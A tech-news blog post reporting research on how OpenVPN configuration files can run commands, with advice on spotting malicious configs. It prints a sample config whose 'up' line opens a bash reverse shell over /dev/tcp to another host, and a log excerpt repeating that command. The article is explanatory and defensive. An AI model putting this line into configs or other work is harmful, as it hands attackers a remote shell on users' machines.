Category: IT|Jun 23, 2018 | Author: Admin

Downloading 3rd Party OpenVPN Configs May Be Dangerous. Here’s Why.

Share on

Call me a cynic, but one thing I have learned from the using the Internet is to double-check, if not triple-check, everything you download. So many downloads have malware, adware, and scripts that perform malicious activities on your computer that it has to be a requirement to thoroughly check a download before it's used.

Call me a cynic, but one thing I have learned from the using the Internet is to double-check, if not triple-check, everything you download. So many downloads have malware, adware, and scripts that perform malicious activities on your computer that it has to be a requirement to thoroughly check a download before it's used.

This point is shown in research posted by Tenable reverse engineer Jacob Baines, where he shows how a normally harmless VPN configuration file can be used to open a backdoor on a computer that uses it. 

OpenVPN configs can execute commands
In his article, Baines explains how a simple OpenVPN configuration file can be used to execute commands on a computer after a VPN connection is made. This could also attackers to distribute OpenVPN configuration files that automatically execute commands to open backdoors through a reverse shell or perform other unwanted behavior on the computer.

OpenVPN is a popular open-source VPN program that allows you to create a secure and encrypted network connection between your computer or device and another network. Due to its popularity, it has been ported to work on a variety of devices, including routers that run DD-WRT. To facilitate this, VPN providers create OpenVPN profiles that can be downloaded and installed in order to easily configure a VPN connection.

According to Baines, to do this all a bad actor would need to do is to add a few lines to a harmless OpenVPN configuration file (.opvpn) to make it malicious. In Baines' example, an OpenVPN configuration file is simply a text file with some commands in it:

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun

If an actor wanted to cause the OpenVPN configuration file to execute a command they would add the "script-security 2" line, which allows user-defined scripts to be executed,  and an "up" entry, which contains the command that is executed after a connection has been made.  As an example, he changed the above configuration file so that it executes a command as shown below.

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”

When this configuration file is used and after a connection has been established, OpenVPN will execute the above command to open a reverse shell to the computer at 192.168.1.218. This would allow the attacker at that IP address to execute commands on the remote computer that ran the OpenVPN configuration file.

Baines even goes on to show how the above method could be ported to attack Windows users by using a PowerShell script instead.

While this shows you should be careful about downloading OpenVPN configs from third-parties, Baines told BleepingComputer that he has not found any malicious configs currently in the wild.

How do you detect malicious OpenVPN configuration files?
Now that you know that OpenVPN configuration could be used against you, you may be wondering how to check if any that you use are malicious.

In his article, Baines states that you can find clues in a VPN connection log as shown below.

Thu Jun 7 12:28:23 2018 NOTE: the current — script-security setting may allow this configuration to call user-defined scripts
Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init

If you see the above lines in your log, it means the "script-security 2" setting was used, which allows user-defined scripts to be executed. As that line is required to run scripts, it would follow that something is being executed by the configuration file. You should be able to spot the command being executed as shown by the second line in the log above.

As OpenVPN configuration files simply text files, you can also check if an OpenVPN configuration is malicious by opening the file up in Notepad or another text editor. This will allow you to see the entire configuration file and spot if any commands are being executed.

Unfortunately, OpenVPN has other configuration directives that can execute commands as well and Baines recommends users use the Viscosity OpenVPN instead, which can filter out these types of commands.

"Unfortunately, the up command is not the only command that can be used in this way," Baines told BleepingComputer. "Up, down, client-connect, learn-address, auth-user-pass-verify, and learn-address all execute configuration specified commands (although some of these are server specific). A layperson might try to review and understand the configuration file. However, I think it's safer to use a client like viscosity that simply filters out this behavior."

Sponsored Ads:

Comments:


All versions of Windows are exposed

Category: Microsoft|Sep 25, 2021 | Author: Admin

Android's underappreciated upgrade advantage

Category: Google|Sep 24, 2021 | Author: Admin

No Electricity? A New Cooling System Uses Sunlight and Saltwater

Category: General|Sep 23, 2021 | Author: Admin

Slack begins rolling out video and audio message ‘clips’

Category: General|Sep 22, 2021 | Author: Admin

Roku's free OS 10.5 lets you dictate passwords, fixes pesky sound lags on headphones

Category: IT|Sep 21, 2021 | Author: Admin

Some good news and some strange news from Apple

Category: Apple|Sep 20, 2021 | Author: Admin

New Windows security updates break network printing

Category: Microsoft|Sep 19, 2021 | Author: Admin

Sent 700tb over 4 km of laser technology

Category: IT|Sep 18, 2021 | Author: Admin

'Massive' transatlantic data cable landed on beach in Bude

Category: Google|Sep 17, 2021 | Author: Admin

YouTube shuts down Discord music bot ‘Rythm’

Category: Google|Sep 16, 2021 | Author: Admin

Facebook's secret rules differentiate between the "elite" and most people

Category: General|Sep 15, 2021 | Author: Admin

Apple suddenly had to crisis-update the iPhone and Mac

Category: Apple|Sep 14, 2021 | Author: Admin

Epic is blocked forever on all Apple platforms

Category: Apple|Sep 13, 2021 | Author: Admin

NVIDIA To Launch GeForce RTX 30 SUPER ‘Ampere Refresh’ In January 2022, GeForce RTX 40 ‘Ada Lovelace’ GPUs in October 2022

Category: General|Sep 12, 2021 | Author: Admin

3 smart shortcuts for a curiously hidden Chrome OS command

Category: Google|Sep 11, 2021 | Author: Admin
more